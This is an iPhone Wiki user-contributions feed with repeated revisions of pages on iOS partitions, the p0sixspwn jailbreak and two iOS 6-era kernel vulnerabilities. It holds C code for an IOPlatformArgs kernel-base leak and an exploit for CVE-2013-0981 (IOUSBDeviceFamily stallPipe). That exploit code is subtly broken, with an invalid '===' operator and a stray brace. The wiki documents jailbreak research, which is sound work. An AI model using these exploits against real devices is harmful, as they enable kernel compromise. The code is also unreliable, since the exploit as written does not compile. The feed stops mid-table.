The iPhone Wiki - User contributions [en]

User:I3ppwn

2020-05-29T11:37:13Z

I3ppwn:

My account on here still exists...?
Oh wow...
So many memories...

/dev/disk0s1s2

2014-07-08T10:26:29Z

I3ppwn: Created page with "This partition is for user data (i.e apps, music, photos, etc.), it's usually the bigger than the /dev/disk0s1s1 partition, though it depends on the Flash memory left on the d..."

This partition is for user data (i.e apps, music, photos, etc.), it's usually the bigger than the /dev/disk0s1s1 partition, though it depends on the Flash memory left on the device

/dev/disk0s1s1

2014-07-08T09:32:38Z

I3ppwn: Created page with "It is for iOS System files. It is equivalent to OS X's /System and /Library directories. The size by default is around 1GB iirc. But the size can be changed with redsn0w or sn..."

It is for iOS System files. It is equivalent to OS X's /System and /Library directories. The size by default is around 1GB iirc. But the size can be changed with redsn0w or sn0wbreeze. It's the smallest partition.

IOPlatfromArgs leak

2014-07-04T13:39:25Z

I3ppwn:

Vulnerability used in [[p0sixspwn]]
This vulnerability leaks the kernel base address.
This is the code
<code>
static uint32_t
get_kernel_base_boot_args(void)
{
CFStringRef parameter = CFSTR("IOPlatformArgs");
CFDataRef data;
io_service_t platformExpert = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOPlatformExpertDevice"));
if (platformExpert)
{
data = IORegistryEntryCreateCFProperty(platformExpert,
parameter,
kCFAllocatorDefault, 0);
}
IOObjectRelease(platformExpert);
CFIndex bufferLength = CFDataGetLength(data);
UInt8 *buffer = malloc(bufferLength);
CFDataGetBytes(data, CFRangeMake(0,bufferLength), (UInt8*) buffer);
typedef struct {
uint32_t deviceTreeP;
uint32_t bootArgs;
uint32_t zero;
uint32_t zero_1;
} platformArgs;
platformArgs IOPlatformArgs;
bcopy(buffer, &IOPlatformArgs, sizeof(IOPlatformArgs));
return IOPlatformArgs.bootArgs;
}
</code>

Once the attacker knows the virtual base, he can use the <code>virt_to_phys</code> macro to see what the physical base is, this way both bases are leaked. This all relies on the IOPlatformArgs bug

IOPlatfromArgs leak

2014-07-04T13:38:39Z

I3ppwn:

Vulnerability used in [[p0sixspwn]]
This vulnerability leaks the kernel base address.
This is the code
<code>
static uint32_t
get_kernel_base_boot_args(void)
{
CFStringRef parameter = CFSTR("IOPlatformArgs");
CFDataRef data;

io_service_t platformExpert = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceMatching("IOPlatformExpertDevice"));
if (platformExpert)
{
data = IORegistryEntryCreateCFProperty(platformExpert,
parameter,
kCFAllocatorDefault, 0);
}

IOObjectRelease(platformExpert);
CFIndex bufferLength = CFDataGetLength(data);
UInt8 *buffer = malloc(bufferLength);
CFDataGetBytes(data, CFRangeMake(0,bufferLength), (UInt8*) buffer);

typedef struct {
uint32_t deviceTreeP;
uint32_t bootArgs;
uint32_t zero;
uint32_t zero_1;
} platformArgs;
platformArgs IOPlatformArgs;
bcopy(buffer, &IOPlatformArgs, sizeof(IOPlatformArgs));

return IOPlatformArgs.bootArgs;
}
</code>

Once the attacker knows the virtual base, he can use the <code>virt_to_phys</code> macro to see what the physical base is, this way both bases are leaked. This all relies on the IOPlatformArgs bug

P0sixspwn

2014-06-30T09:20:56Z

I3ppwn:

{{lowercase}}
'''p0sixspwn''' is an [[untethered jailbreak]] for iOS 6.1.3-6.1.6 by [[User:winocm|winocm]], [[User:Ih8sn0w|iH8sn0w]] and [https://twitter.com/SquiffyPwn SquiffyPwn]. It was initially made available as an Cydia package on [[Saurik]]'s repo to untether already jailbroken devices. It works with all devices that support iOS 6.1.3-6.1.6 and 5.2.1 - 5.3 on [[k66ap|Apple TV 2G]]. On 30 December 2013, a Mac OS X program was released to perform a jailbreak. A Windows program was released on 3 January 2014.

== Cydia Package Changelog ==
* '''1.0-5''' the initial release of the untether
* '''1.0-9''' [[n90ap|iPhone 4 (iPhone3,1)]] boot loop fix
* '''1.1-1''' Automatically reboot after 30 seconds if device did not boot. (iH8sn0w's repo only)
* '''1.1-2''' Automatically reboot after one minute if device did not boot due to 30 seconds was too quick. (iH8sn0w's repo only)
* '''1.1-3''' Automatically reboot after two minutes if device did not boot due to 60 seconds was too quick. (iH8sn0w's repo only)
* '''1.2-1''' Various bug fixes.
* '''1.3-2''' Fixes iMessage, LTE issues and Apple TV 2G support.
* '''1.4-1''' Support iOS 6.1.6.

==Download==
{| class="wikitable"
! Version
! OS
! SHA-1 Hash
! Download
! Changes
|-
! 1.0.0
| rowspan="3" | [[wikipedia:OS X|OS X]]
| <code>b5a66f4e58ab4c813fc851d479b28188eb5115ec</code>
| style="text-decoration: line-through;" | [https://MEGA.co.nz/#!0xtw0DAT!YVZmNXsn-kl1kH655zgpMGz8hSVVgk8FU3qlTPNfSdU MEGA]
|
* Initial release.
|-
! 1.0.1
| <code>ae5b3907660b161b2ff94a2e2cfef97195404a89</code>
| style="text-decoration: line-through;" | [https://MEGA.co.nz/#!l8lniKxL!ODQrFDGbOUpm2hvU-mQggm25IgNk3_TmSO1r7tlU178 MEGA]
|
* Resolves issues with [[iPod touch 5G]] not being detected.
|-
! 1.0.2
| <code>259e95fd16468260c8831ca17186f50b7d14ba41</code>
| [https://MEGA.co.nz/#!DVtmGLqa!BX2-OQUliBcfdlenMLa93mKxk244KpD9Z71p_DAeil8 MEGA]
|
* Resolves issues with LTE/data.
|-
! 1.0.3
| rowspan="2" | [[wikipedia:Microsoft Windows|Windows]]
| <code>060c95cda0e5ad861bd225ca19324e6ebd3c0a5d</code>
| style="text-decoration: line-through;" | [https://MEGA.co.nz/#!x0sk1SjB!S86WIGnifrgVhf5aoFQiPHl5aMJvS3miIeTTy9pLL_w MEGA]
|
* Initial release for Windows.
|-
! 1.0.4
| <code>0a40a9780ba0dd9f0476d12950b4fb0026c8559a</code>
| style="text-decoration: line-through;" | [https://MEGA.co.nz/#!Vl9zFJYC!JaCsqwnNNDJvj_4t0APjC2XPBg0ZuUwMSNNz2MGb4Xw MEGA]
|
* Added README and time adjustments for slow PC's.
|-
! rowspan="2" | 1.0.5
| [[wikipedia:OS X|OS X]]
| <code>b99fb1de846c406a15bbd710b623ddd78e139e5e</code>
| style="text-decoration: line-through;" | [https://MEGA.co.nz/#!B5lxxDLD!YrvjGhvVDxm2ah94hafI7TJWfm9EK0aWsh4_7YN78qE MEGA]
| rowspan="2" |
* Fixes some issues.
* Support for Mac OS X Snow Leopard.
|-
| [[wikipedia:Microsoft Windows|Windows]]
| <code>7c782a39ed123f70594e2438eaacc95340e363e3</code>
| style="text-decoration: line-through;" class="rborderplz nobrradiusplz" | [https://MEGA.co.nz/#!l1UFgJiA!Ogbi6Q1GsKZZMZzEhi8w1zvlHXEh0QuDBIGdjfktHb0 MEGA]
|-
! rowspan="2" | 1.0.7
| [[wikipedia:OS X|OS X]]
| <code>7f4f867a2e3739e8ee70f7bc7e47afe9871c69b6</code>
| [https://MEGA.co.nz/#!Y8M2VAiS!Bq4NRjrlZXE754uNqSJT90mUzwsSGMPVa2PWsp78344 MEGA]
| rowspan="2" |
* Fixes Cydia sometimes not showing up
|-
| [[wikipedia:Microsoft Windows|Windows]]
| <code>868a05ba26fd679a28c3eac0c4dc2c0cbb5e9529</code>
| class="rborderplz" | [https://MEGA.co.nz/#!E0sESCiC!c-ulVmjoa9qtPDe0MBIQgz9D2H03NgCxjBKZmAUPKRc MEGA]
|-
! rowspan="2" | 1.0.8
| [[wikipedia:OS X|OS X]]
| <code>aa20c28c2e052c08893fdbf49d16f084df2f46e6</code>
| [https://MEGA.co.nz/#!hptDFbzb!Dfa8Th7Ngw6PyDSnWDyMmzHbGYDrMqk64kRMB4MCv0c MEGA]
| rowspan="2" |
* Supports iOS 6.1.6
* Fixes iTunes 11.1+ crashes
|-
| [[wikipedia:Microsoft Windows|Windows]]
| <code>5d2711a99433daa1800d1327207bfc870cd16698 </code>
| class="rborderplz nobrradiusplz" | [https://MEGA.co.nz/#!Rp12yZrK!EhZjmllrpQ4JDC7VvHbcUEautLNBSSFUgBzKFzB20js MEGA]
|}

== Exploits ==
* [[posix_spawn kernel information leak]] (by [[i0n1c]]) (proof? what is it used for?)
* [[mach_msg_ool_descriptor_ts for heap shaping]] (proof/quotes? no information found)
* [[AMFID_code_signing_evasion]]
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1273 CVE-2014-1273] (by [[planetbeing]]) (proof/quotes? no information found)
* [[DeveloperDiskImage race condition]] (by [[comex]]) (proof/quotes? no information found)
* [[Symbolic Link Vulnerability]]
* [[launchd.conf untether]]
* [[IOPlatfromArgs leak]] (by [[iH8sn0w]])
* [[TTE Remapping]] (by [[winocm]])

== External Links ==
* [http://blog.ih8sn0w.com/2013/12/613-615-3gsa4-untether-cydia-package.html iH8sn0w's blog post on the release.]
* [http://p0sixspwn.com/ p0sixspwn]
* [https://github.com/p0sixspwn/p0sixspwn Source Code on GitHub]

[[Category:Hacking Software]]
[[Category:Jailbreaks]]

P0sixspwn

2014-06-30T09:20:16Z

I3ppwn:

{{lowercase}}
'''p0sixspwn''' is an [[untethered jailbreak]] for iOS 6.1.3-6.1.6 by [[User:winocm|winocm]], [[User:Ih8sn0w|iH8sn0w]] and [https://twitter.com/SquiffyPwn SquiffyPwn]. It was initially made available as an Cydia package on [[Saurik]]'s repo to untether already jailbroken devices. It works with all devices that support iOS 6.1.3-6.1.6 and 5.2.1 - 5.3 on [[k66ap|Apple TV 2G]]. On 30 December 2013, a Mac OS X program was released to perform a jailbreak. A Windows program was released on 3 January 2014.

== Cydia Package Changelog ==
* '''1.0-5''' the initial release of the untether
* '''1.0-9''' [[n90ap|iPhone 4 (iPhone3,1)]] boot loop fix
* '''1.1-1''' Automatically reboot after 30 seconds if device did not boot. (iH8sn0w's repo only)
* '''1.1-2''' Automatically reboot after one minute if device did not boot due to 30 seconds was too quick. (iH8sn0w's repo only)
* '''1.1-3''' Automatically reboot after two minutes if device did not boot due to 60 seconds was too quick. (iH8sn0w's repo only)
* '''1.2-1''' Various bug fixes.
* '''1.3-2''' Fixes iMessage, LTE issues and Apple TV 2G support.
* '''1.4-1''' Support iOS 6.1.6.

==Download==
{| class="wikitable"
! Version
! OS
! SHA-1 Hash
! Download
! Changes
|-
! 1.0.0
| rowspan="3" | [[wikipedia:OS X|OS X]]
| <code>b5a66f4e58ab4c813fc851d479b28188eb5115ec</code>
| style="text-decoration: line-through;" | [https://MEGA.co.nz/#!0xtw0DAT!YVZmNXsn-kl1kH655zgpMGz8hSVVgk8FU3qlTPNfSdU MEGA]
|
* Initial release.
|-
! 1.0.1
| <code>ae5b3907660b161b2ff94a2e2cfef97195404a89</code>
| style="text-decoration: line-through;" | [https://MEGA.co.nz/#!l8lniKxL!ODQrFDGbOUpm2hvU-mQggm25IgNk3_TmSO1r7tlU178 MEGA]
|
* Resolves issues with [[iPod touch 5G]] not being detected.
|-
! 1.0.2
| <code>259e95fd16468260c8831ca17186f50b7d14ba41</code>
| [https://MEGA.co.nz/#!DVtmGLqa!BX2-OQUliBcfdlenMLa93mKxk244KpD9Z71p_DAeil8 MEGA]
|
* Resolves issues with LTE/data.
|-
! 1.0.3
| rowspan="2" | [[wikipedia:Microsoft Windows|Windows]]
| <code>060c95cda0e5ad861bd225ca19324e6ebd3c0a5d</code>
| style="text-decoration: line-through;" | [https://MEGA.co.nz/#!x0sk1SjB!S86WIGnifrgVhf5aoFQiPHl5aMJvS3miIeTTy9pLL_w MEGA]
|
* Initial release for Windows.
|-
! 1.0.4
| <code>0a40a9780ba0dd9f0476d12950b4fb0026c8559a</code>
| style="text-decoration: line-through;" | [https://MEGA.co.nz/#!Vl9zFJYC!JaCsqwnNNDJvj_4t0APjC2XPBg0ZuUwMSNNz2MGb4Xw MEGA]
|
* Added README and time adjustments for slow PC's.
|-
! rowspan="2" | 1.0.5
| [[wikipedia:OS X|OS X]]
| <code>b99fb1de846c406a15bbd710b623ddd78e139e5e</code>
| style="text-decoration: line-through;" | [https://MEGA.co.nz/#!B5lxxDLD!YrvjGhvVDxm2ah94hafI7TJWfm9EK0aWsh4_7YN78qE MEGA]
| rowspan="2" |
* Fixes some issues.
* Support for Mac OS X Snow Leopard.
|-
| [[wikipedia:Microsoft Windows|Windows]]
| <code>7c782a39ed123f70594e2438eaacc95340e363e3</code>
| style="text-decoration: line-through;" class="rborderplz nobrradiusplz" | [https://MEGA.co.nz/#!l1UFgJiA!Ogbi6Q1GsKZZMZzEhi8w1zvlHXEh0QuDBIGdjfktHb0 MEGA]
|-
! rowspan="2" | 1.0.7
| [[wikipedia:OS X|OS X]]
| <code>7f4f867a2e3739e8ee70f7bc7e47afe9871c69b6</code>
| [https://MEGA.co.nz/#!Y8M2VAiS!Bq4NRjrlZXE754uNqSJT90mUzwsSGMPVa2PWsp78344 MEGA]
| rowspan="2" |
* Fixes Cydia sometimes not showing up
|-
| [[wikipedia:Microsoft Windows|Windows]]
| <code>868a05ba26fd679a28c3eac0c4dc2c0cbb5e9529</code>
| class="rborderplz" | [https://MEGA.co.nz/#!E0sESCiC!c-ulVmjoa9qtPDe0MBIQgz9D2H03NgCxjBKZmAUPKRc MEGA]
|-
! rowspan="2" | 1.0.8
| [[wikipedia:OS X|OS X]]
| <code>aa20c28c2e052c08893fdbf49d16f084df2f46e6</code>
| [https://MEGA.co.nz/#!hptDFbzb!Dfa8Th7Ngw6PyDSnWDyMmzHbGYDrMqk64kRMB4MCv0c MEGA]
| rowspan="2" |
* Supports iOS 6.1.6
* Fixes iTunes 11.1+ crashes
|-
| [[wikipedia:Microsoft Windows|Windows]]
| <code>5d2711a99433daa1800d1327207bfc870cd16698 </code>
| class="rborderplz nobrradiusplz" | [https://MEGA.co.nz/#!Rp12yZrK!EhZjmllrpQ4JDC7VvHbcUEautLNBSSFUgBzKFzB20js MEGA]
|}

== Exploits ==
* [[posix_spawn kernel information leak]] (by [[i0n1c]]) (proof? what is it used for?)
* [[mach_msg_ool_descriptor_ts for heap shaping]] (proof/quotes? no information found)
* [[AMFID_code_signing_evasion]]
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1273 CVE-2014-1273] (by [[planetbeing]]) (proof/quotes? no information found)
* [[DeveloperDiskImage race condition]] (by [[comex]]) (proof/quotes? no information found)
* [[Symbolic Link Vulnerability]]
* [[launchd.conf untether]]
* [[IOPlatfromArgs leak]] (by [[iH8sn0w]])
* [[TTE Remapping] (by [[winocm]])

== External Links ==
* [http://blog.ih8sn0w.com/2013/12/613-615-3gsa4-untether-cydia-package.html iH8sn0w's blog post on the release.]
* [http://p0sixspwn.com/ p0sixspwn]
* [https://github.com/p0sixspwn/p0sixspwn Source Code on GitHub]

[[Category:Hacking Software]]
[[Category:Jailbreaks]]

User:I3ppwn

2014-06-27T12:54:24Z

I3ppwn: Created page with "Hi? I'm a 14 y/o developer working on jailbreak stuff, I do research about low-level iOS, I develop in C/C++, Bash and ARM Assembly, I like doing stuff with iOS, I suck at re..."

Hi?

I'm a 14 y/o developer working on jailbreak stuff, I do research about low-level iOS, I develop in C/C++, Bash and ARM Assembly, I like doing stuff with iOS, I suck at reverse engineering but I still do it (much lol).

<code>
#define i3ppwn(lel, amount) lel * amount + lel - amount
</code>

IOUSBDeviceFamily Vulnerability

2014-06-14T18:27:48Z

I3ppwn:

This is CVE-2013-0981.
This kernel vulnerability comes from the <code>com.apple.iokit.IOUSBDeviceInterface</code> driver. There are several methods that accept a pipe object pointer from user space, but do not validate the pointer except for testing if it is non-null. An application that can communicate with USB devices (holding <code>com.apple.security.device.usb</code> [[entitlement]]) can call IOUSBDeviceInterface functions directly and give them a malformed pipe object which can result in arbitrary code execution if the memory referenced by the given pip object pointer can be controlled from user space. [[evasi0n]] uses function 15 (stallPipe) for exploitation.
This is an implementation of the exploit code.
<code>
void exploit_kern_612(void)
{
kern_return_t ret;
CFMutableDictionaryRef lol = IOServiceMatching( "IOUSBDeviceInterface" );
if( lol != NULL )
{
io_connect_t connect;
io_service_t io_service = IOServiceGetMatchingService( kIOMasterPortDefault, lol );
ret = IOServiceOpen( io_service, mach_task_self(), 0, &connect );

// check if this bs works
if(ret === KERN_SUCCESS)
{
uint32_t fakr[100] = {0};
fakr[0x28/4] = 1;
fakr[0x8/4] = (uint32_t)fakr;
fakr[0x20/4] = 0;
fakr[0x50/4] = (uint32_t)fakr;
fakr[0] = (uint32_t)fakr;
fakr[0x70/4] = 0x12345678;
// fakr

uint64_t lel_again = (uint32_t)fakr;
IOConnectCallMethod(connect, 15, &lel_again, 1, NULL, 0, NULL, NULL, NULL, NULL);
}
}
}
}
</code>

TODO: Describe [[evasi0n]] exploitation in detail here.

Apple's description in the iOS 6.1.3 security fixes:

<cite>
'''USB''' 
Impact: A local user may be able to execute arbitrary code in the kernel 
Description: The IOUSBDeviceFamily driver used pipe object pointers that came from userspace. This issue was addressed by performing additional validation of pipe object pointers.
</cite>

== See also ==
* [[evasi0n]]

== References ==
* [http://iphonedevwiki.net/index.php/IOUSBDeviceFamily IOUSBDeviceFamily on iphonedevwiki] (missing in this wiki!)
* [http://blog.azimuthsecurity.com/2013/02/from-usr-to-svc-dissecting-evasi0n.html Analysis by kernelpool]
* [http://support.apple.com/kb/HT5704 Apple's iOS 6.1.3 security fixes]
* [http://support.apple.com/kb/HT5702 Apple's iOS 5.2.1 (Apple TV) security fixes]
* [http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2013-0981 NIST Reference CVE-2013-0981]
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-0981 Mitre Reference CVE-2013-0981]

[[Category:Exploits]]

IOPlatfromArgs leak

2014-06-14T18:14:07Z

I3ppwn:

Vulnerability used in [[p0sixspwn]]
This vulnerability leaks the kernel base address.
This is the code
<code>
unsigned long getKernelBase() {
unsigned long buf;
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceNameMatching("device-tree"));
if(service)
{
CFDataRef macData = IORegistryEntryCreateCFProperty(service, CFSTR("IOPlatformArgs"), kCFAllocatorDefault, 0);
if(macData != NULL)
{
/*
void CFDataGetBytes (
CFDataRef theData,
CFRange range,
UInt8 *buffer
);
*/
CFDataGetBytes(macData, CFRangeMake(0,sizeof(buf)), &buf); // TODO: buf != UInt8
// XXX: TODO: change decrement based on device.
// N90 ONLY FOR NOW!
buf -= 0xE1C000; // Diff.
CFRelease(macData);
IOObjectRelease(service);
return buf;
}
IOObjectRelease(service);
}
return 0;
} // iH8sn0w
</code>

Once the attacker knows the virtual base, he can use the <code>virt_to_phys</code> macro to see what the physical base is, this way both bases are leaked. This all relies on the IOPlatformArgs bug

IOPlatfromArgs leak

2014-06-14T18:13:37Z

I3ppwn: Created page with "Vulnerability used in p0sixspwn This vulnerability leaks the kernel base address. This is the code <code> unsigned long getKernelBase() { unsigned long buf; io_..."

Vulnerability used in [[p0sixspwn]]
This vulnerability leaks the kernel base address.
This is the code
<code>
unsigned long getKernelBase() {
unsigned long buf;
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceNameMatching("device-tree"));
if(service)
{
CFDataRef macData = IORegistryEntryCreateCFProperty(service, CFSTR("IOPlatformArgs"), kCFAllocatorDefault, 0);
if(macData != NULL)
{
/*
void CFDataGetBytes (
CFDataRef theData,
CFRange range,
UInt8 *buffer
);
*/
CFDataGetBytes(macData, CFRangeMake(0,sizeof(buf)), &buf); // TODO: buf != UInt8
// XXX: TODO: change decrement based on device.
// N90 ONLY FOR NOW!
buf -= 0xE1C000; // Diff.
CFRelease(macData);
IOObjectRelease(service);
return buf;
}
IOObjectRelease(service);
}
return 0;
}
</code>

Once the attacker knows the virtual base, he can use the <code>virt_to_phys</code> macro to see what the physical base is, this way both bases are leaked. This all relies on the IOPlatformArgs bug

P0sixspwn

2014-06-14T18:06:56Z

I3ppwn:

{{lowercase}}
'''p0sixspwn''' is an [[untethered jailbreak]] for iOS 6.1.3-6.1.5 by [[User:winocm|winocm]], [[User:Ih8sn0w|iH8sn0w]] and [https://twitter.com/SquiffyPwn SquiffyPwn]. It was initially made available as an Cydia package on [[Saurik]]'s repo to untether already jailbroken devices. It works with all devices that support iOS 6.1.3-6.1.5 and 5.2.1 - 5.3 on [[k66ap|Apple TV 2G]]. On 30 December 2013, a Mac OS X program was released to perform a jailbreak. A Windows program was released on 3 January 2014.

== Cydia Package Changelog ==
* '''1.0-5''' the initial release of the untether
* '''1.0-9''' [[n90ap|iPhone 4 (iPhone3,1)]] boot loop fix
* '''1.1-1''' Automatically reboot after 30 seconds if device did not boot. (iH8sn0w's repo only)
* '''1.1-2''' Automatically reboot after one minute if device did not boot due to 30 seconds was too quick. (iH8sn0w's repo only)
* '''1.1-3''' Automatically reboot after two minutes if device did not boot due to 60 seconds was too quick. (iH8sn0w's repo only)
* '''1.2-1''' Various bug fixes.
* '''1.3-2''' Fixes iMessage, LTE issues and Apple TV 2G support.
* '''1.4-1''' Support iOS 6.1.6.

==Download==
{| class="wikitable"
! Version
! OS
! SHA-1 Hash
! Download
! Changes
|-
! 1.0.0
| rowspan="3" | [[wikipedia:OS X|OS X]]
| <code>b5a66f4e58ab4c813fc851d479b28188eb5115ec</code>
| style="text-decoration: line-through;" | [https://MEGA.co.nz/#!0xtw0DAT!YVZmNXsn-kl1kH655zgpMGz8hSVVgk8FU3qlTPNfSdU MEGA]
|
* Initial release.
|-
! 1.0.1
| <code>ae5b3907660b161b2ff94a2e2cfef97195404a89</code>
| style="text-decoration: line-through;" | [https://MEGA.co.nz/#!l8lniKxL!ODQrFDGbOUpm2hvU-mQggm25IgNk3_TmSO1r7tlU178 MEGA]
|
* Resolves issues with [[iPod touch 5G]] not being detected.
|-
! 1.0.2
| <code>259e95fd16468260c8831ca17186f50b7d14ba41</code>
| [https://MEGA.co.nz/#!DVtmGLqa!BX2-OQUliBcfdlenMLa93mKxk244KpD9Z71p_DAeil8 MEGA]
|
* Resolves issues with LTE/data.
|-
! 1.0.3
| rowspan="2" | [[wikipedia:Microsoft Windows|Windows]]
| <code>060c95cda0e5ad861bd225ca19324e6ebd3c0a5d</code>
| style="text-decoration: line-through;" | [https://MEGA.co.nz/#!x0sk1SjB!S86WIGnifrgVhf5aoFQiPHl5aMJvS3miIeTTy9pLL_w MEGA]
|
* Initial release for Windows.
|-
! 1.0.4
| <code>0a40a9780ba0dd9f0476d12950b4fb0026c8559a</code>
| style="text-decoration: line-through;" | [https://MEGA.co.nz/#!Vl9zFJYC!JaCsqwnNNDJvj_4t0APjC2XPBg0ZuUwMSNNz2MGb4Xw MEGA]
|
* Added README and time adjustments for slow PC's.
|-
! rowspan="2" | 1.0.5
| [[wikipedia:OS X|OS X]]
| <code>b99fb1de846c406a15bbd710b623ddd78e139e5e</code>
| style="text-decoration: line-through;" | [https://MEGA.co.nz/#!B5lxxDLD!YrvjGhvVDxm2ah94hafI7TJWfm9EK0aWsh4_7YN78qE MEGA]
| rowspan="2" |
* Fixes some issues.
* Support for Mac OS X Snow Leopard.
|-
| [[wikipedia:Microsoft Windows|Windows]]
| <code>7c782a39ed123f70594e2438eaacc95340e363e3</code>
| style="text-decoration: line-through;" class="rborderplz nobrradiusplz" | [https://MEGA.co.nz/#!l1UFgJiA!Ogbi6Q1GsKZZMZzEhi8w1zvlHXEh0QuDBIGdjfktHb0 MEGA]
|-
! rowspan="2" | 1.0.7
| [[wikipedia:OS X|OS X]]
| <code>7f4f867a2e3739e8ee70f7bc7e47afe9871c69b6</code>
| [https://MEGA.co.nz/#!Y8M2VAiS!Bq4NRjrlZXE754uNqSJT90mUzwsSGMPVa2PWsp78344 MEGA]
| rowspan="2" |
* Fixes Cydia sometimes not showing up
|-
| [[wikipedia:Microsoft Windows|Windows]]
| <code>868a05ba26fd679a28c3eac0c4dc2c0cbb5e9529</code>
| class="rborderplz" | [https://MEGA.co.nz/#!E0sESCiC!c-ulVmjoa9qtPDe0MBIQgz9D2H03NgCxjBKZmAUPKRc MEGA]
|-
! rowspan="2" | 1.0.8
| [[wikipedia:OS X|OS X]]
| <code>aa20c28c2e052c08893fdbf49d16f084df2f46e6</code>
| [https://MEGA.co.nz/#!hptDFbzb!Dfa8Th7Ngw6PyDSnWDyMmzHbGYDrMqk64kRMB4MCv0c MEGA]
| rowspan="2" |
* Supports iOS 6.1.6
* Fixes iTunes 11.1+ crashes
|-
| [[wikipedia:Microsoft Windows|Windows]]
| <code>5d2711a99433daa1800d1327207bfc870cd16698 </code>
| class="rborderplz nobrradiusplz" | [https://MEGA.co.nz/#!Rp12yZrK!EhZjmllrpQ4JDC7VvHbcUEautLNBSSFUgBzKFzB20js MEGA]
|}

== Exploits ==
* [[posix_spawn kernel information leak]] (by [[i0n1c]]) (proof? what is it used for?)
* [[mach_msg_ool_descriptor_ts for heap shaping]] (proof/quotes? no information found)
* [[AMFID_code_signing_evasion]]
* [http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1273 CVE-2014-1273] (by [[planetbeing]]) (proof/quotes? no information found)
* [[DeveloperDiskImage race condition]] (by [[comex]]) (proof/quotes? no information found)
* [[Symbolic Link Vulnerability]]
* [[launchd.conf untether]]
* [[IOPlatfromArgs leak]] (by [[iH8sn0w]])

== External Links ==
* [http://blog.ih8sn0w.com/2013/12/613-615-3gsa4-untether-cydia-package.html iH8sn0w's blog post on the release.]
* [http://p0sixspwn.com/ p0sixspwn]
* [https://github.com/p0sixspwn/p0sixspwn Source Code on GitHub]

[[Category:Hacking Software]]
[[Category:Jailbreaks]]

P0sixspwn

2014-06-14T18:03:11Z

I3ppwn: /* Exploits */

{{lowercase}}
'''p0sixspwn''' is an [[untethered jailbreak]] for iOS 6.1.3-6.1.5 by [[User:winocm|winocm]], [[User:Ih8sn0w|iH8sn0w]] and [https://twitter.com/SquiffyPwn SquiffyPwn]. It was initially made available as an Cydia package on [[Saurik]]'s repo to untether already jailbroken devices. It works with all devices that support iOS 6.1.3-6.1.5 and 5.2.1 - 5.3 on [[k66ap|Apple TV 2G]]. On 30 December 2013, a Mac OS X program was released to perform a jailbreak. A Windows program was released on 3 January 2014.

== Cydia Package Changelog ==
* '''1.0-5''' the initial release of the untether
* '''1.0-9''' [[n90ap|iPhone 4 (iPhone3,1)]] boot loop fix
* '''1.1-1''' Automatically reboot after 30 seconds if device did not boot. (iH8sn0w's repo only)
* '''1.1-2''' Automatically reboot after one minute if device did not boot due to 30 seconds was too quick. (iH8sn0w's repo only)
* '''1.1-3''' Automatically reboot after two minutes if device did not boot due to 60 seconds was too quick. (iH8sn0w's repo only)
* '''1.2-1''' Various bug fixes.
* '''1.3-2''' Fixes iMessage, LTE issues and Apple TV 2G support.
* '''1.4-1''' Support iOS 6.1.6.

==Download==
{| class="wikitable"
! Version
! OS
! SHA-1 Hash
! Download
! Changes
|-
! 1.0.0
| rowspan="3" | [[wikipedia:OS X|OS X]]
| <code>b5a66f4e58ab4c813fc851d479b28188eb5115ec</code>
| style="text-decoration: line-through;" | [https://MEGA.co.nz/#!0xtw0DAT!YVZmNXsn-kl1kH655zgpMGz8hSVVgk8FU3qlTPNfSdU MEGA]
|
* Initial release.
|-
! 1.0.1
| <code>ae5b3907660b161b2ff94a2e2cfef97195404a89</code>
| style="text-decoration: line-through;" | [https://MEGA.co.nz/#!l8lniKxL!ODQrFDGbOUpm2hvU-mQggm25IgNk3_TmSO1r7tlU178 MEGA]
|
* Resolves issues with [[iPod touch 5G]] not being detected.
|-
! 1.0.2
| <code>259e95fd16468260c8831ca17186f50b7d14ba41</code>
| [https://MEGA.co.nz/#!DVtmGLqa!BX2-OQUliBcfdlenMLa93mKxk244KpD9Z71p_DAeil8 MEGA]
|
* Resolves issues with LTE/data.
|-
! 1.0.3
| rowspan="2" | [[wikipedia:Microsoft Windows|Windows]]
| <code>060c95cda0e5ad861bd225ca19324e6ebd3c0a5d</code>
| style="text-decoration: line-through;" | [https://MEGA.co.nz/#!x0sk1SjB!S86WIGnifrgVhf5aoFQiPHl5aMJvS3miIeTTy9pLL_w MEGA]
|
* Initial release for Windows.
|-
! 1.0.4
| <code>0a40a9780ba0dd9f0476d12950b4fb0026c8559a</code>
| style="text-decoration: line-through;" | [https://MEGA.co.nz/#!Vl9zFJYC!JaCsqwnNNDJvj_4t0APjC2XPBg0ZuUwMSNNz2MGb4Xw MEGA]
|
* Added README and time adjustments for slow PC's.
|-
! rowspan="2" | 1.0.5
| [[wikipedia:OS X|OS X]]
| <code>b99fb1de846c406a15bbd710b623ddd78e139e5e</code>
| style="text-decoration: line-through;" | [https://MEGA.co.nz/#!B5lxxDLD!YrvjGhvVDxm2ah94hafI7TJWfm9EK0aWsh4_7YN78qE MEGA]
| rowspan="2" |
* Fixes some issues.
* Support for Mac OS X Snow Leopard.
|-
| [[wikipedia:Microsoft Windows|Windows]]
| <code>7c782a39ed123f70594e2438eaacc95340e363e3</code>
| style="text-decoration: line-through;" class="rborderplz nobrradiusplz" | [https://MEGA.co.nz/#!l1UFgJiA!Ogbi6Q1GsKZZMZzEhi8w1zvlHXEh0QuDBIGdjfktHb0 MEGA]
|-
! rowspan="2" | 1.0.7
| [[wikipedia:OS X|OS X]]
| <code>7f4f867a2e3739e8ee70f7bc7e47afe9871c69b6</code>
| [https://MEGA.co.nz/#!Y8M2VAiS!Bq4NRjrlZXE754uNqSJT90mUzwsSGMPVa2PWsp78344 MEGA]
| rowspan="2" |
* Fixes Cydia sometimes not showing up
|-
| [[wikipedia:Microsoft Windows|Windows]]
| <code>868a05ba26fd679a28c3eac0c4dc2c0cbb5e9529</code>
| class="rborderplz" | [https://MEGA.co.nz/#!E0sESCiC!c-ulVmjoa9qtPDe0MBIQgz9D2H03NgCxjBKZmAUPKRc MEGA]
|-
! rowspan="2" | 1.0.8
| [[wikipedia:OS X|OS X]]
| <code>aa20c28c2e052c08893fdbf49d16f084df2f46e6</code>
